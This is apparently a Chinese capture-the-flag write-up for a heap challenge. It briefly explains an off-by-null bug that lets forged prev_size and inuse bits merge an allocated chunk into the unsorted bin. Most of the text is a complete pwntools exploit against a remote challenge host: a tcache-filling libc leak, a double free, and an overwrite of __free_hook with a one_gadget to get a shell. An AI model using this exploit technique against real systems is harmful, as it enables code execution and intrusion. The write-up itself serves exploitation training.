存在off-by-null漏洞,所以可以修改下一chunk的inuse位和pre_size位。修改pre_size位前面堆块大小之和,然后当释放此堆块时由于inuse位是0,所以会判断前面chunk处于释放状态,再根据pre_size向前合并。就会将一个处于malloc状态的chunk带入到unsortedbin中。

EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
from pwn import *
from ctypes import *
from libcfind import *
from LibcSearcher import*
import base64
import sys
context(os='linux', arch='amd64', log_level='debug')
context.terminal = ["tmux","splitw","-h"]
debug = 0
if debug:
p = process('./pwn')
elf = ELF('./pwn')
# p = process('', env={'LD_PRELOAD':'./libc.so'})
# gdb.attach(p)
else:
p = remote('node5.anna.nssctf.cn', 28201)
elf = ELF('./pwn')
# -----------------------------------------------------------------------
s = lambda data: p.send(data)
sa = lambda text, data: p.sendafter(text, data)
sl = lambda data: p.sendline(data)
sla = lambda text, data: p.sendlineafter(text, data)
r = lambda num=4096: p.recv(num)
rl = lambda text: p.recvuntil(text)
pr = lambda num=4096: sys.stdout.write(p.recv(num))
inter = lambda: p.interactive()
l32 = lambda: u32(p.recvuntil('\xf7')[-4:].ljust(4,'\x00'))
l64 = lambda: u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
uu32 = lambda: u32(p.recv(4).ljust(4, '\x00'))
uu64 = lambda: u64(p.recv(6).ljust(8, '\x00'))
int16 = lambda data: int(data, 16)
lg = lambda s, num: p.success('%s -> 0x%x' % (s, num))
# -----------------------------------------------------------------------
libc = ELF('./libc-2.27.so')
def add(size,data):
rl("Your choice: ")
sl('1')
rl("Size")
sl(str(size))
rl("Data:")
sl(data)
def show(index):
rl("Your choice: ")
sl('2')
rl("Index:")
sl(str(index))
def delete(index):
rl("Your choice: ")
sl('3')
rl("Index:")
sl(str(index))

# gdb.attach(p)

add(0xf0,'a')
add(0x68,'a')
add(0xf0,'a')
for i in range(7):
add(0xf0,'a')
for i in range(7)://填满tcache,便于堆块合并
delete(i+3)

delete(0)
delete(1)

add(0x68,'a'*0x68)
delete(0)
add(0x68,'a'*0x60+p64(0x170))

delete(2)
for i in range(7):
add(0xf0,'a')

add(0xf0,'a')
show(0)

libc_leak = uu64()
lg("libc_leak",libc_leak)
libc_base = libc_leak-0x3ebc40-0x60
lg("libc_base",libc_base)
onegadget = [0x4f2a5,0x4f302,0x10a2fc]
free_hook = libc_base+libc.sym['__free_hook']

for i in range(7):
delete(i+2)

add(0x30,'aa')
delete(0)//再利用double_free
delete(2)

add(0x30,p64(free_hook))

add(0x30,'aaa')
add(0x30,p64(libc_base+onegadget[1]))
delete(0)


inter()